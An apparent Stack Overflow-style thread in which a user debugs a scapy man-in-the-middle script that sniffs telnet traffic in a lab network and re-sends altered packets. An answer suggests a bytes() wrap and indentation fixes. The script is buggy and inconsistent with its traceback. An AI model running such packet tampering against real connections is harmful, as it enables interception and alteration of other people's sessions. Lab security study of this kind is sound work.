# TypeError: an integer is required when trying to sniff and spoof a packet against TELNET (EDITED)

Tags: python-3.x, scapy, man-in-the-middle

Trying to sniff and spoof packet while using MITM attack against telnet/netcat, but I get these messages when I send the spoofed packet.

**The telnet attack code:**

```py
#!/usr/bin/python3 
from scapy.all import *

def spoof_pkt(pkt):
    data = pkt[TCP].payload.load
    print("*** %s, length=: %d" % (data, len(data)))
    newpkt = IP(pkt[IP])
    del(newpkt.chksum)
    del(newpkt[TCP].payload)
    del(newpkt[TCP].chksum)

    data_list = list(data)

    for i in range(0, len(data_list)):
**(LINE 19)** -> if chr(data_list[i]).isalpha():
            data_list[i] = ord('A')
        newdata = bytes(data_list)
        send(newpkt/newdata)
pkt = sniff(filter="tcp and host 10.0.2.7", prn=spoof_pkt)
```

**Error message(Edited! new error)**

```py
> Original Packet.........
('Source IP: ', '10.0.2.5')
('Destination IP: ', '10.0.2.7')
('Message: ', 'a')
Message Length: 1
Traceback (most recent call last):

File "./telnet", line 27, in <module>
    pkt = sniff(filter='tcp port 23', prn=spoof_pkt)
  
File "/home/seed/.local/lib/python2.7/site-packages/scapy/sendrecv.py", line 780, 
 in sniff r = prn(p)

File "./telnet", line 19, in spoof_pkt
 if chr(data_list[i]).isalpha(): 

TypeError: an integer is required
```

Comment: What's your intent with `IP(pkt[IP])`?

Comment: Are you trying to make a copy of the IP layer or something?

Comment: HI, thank you for your comment.
Yes, take out the IP portion and use that to construct a new object.

Answer (score 0):

You can wrap your IP packet with `bytes()`.

Like: `newpkt = IP(bytes(pkt[IP]))`

I also feel you are getting the `TypeError: an integer is required` error because of bad identation. It should be:

```py
    for i in range(0, len(data_list)):
        if chr(data_list[i]).isalpha():
            data_list[i] = ord('A')
    newdata = bytes(data_list)
    send(newpkt/newdata)
```

Comment: Thank you for your comment, unfortunately I still get the same error...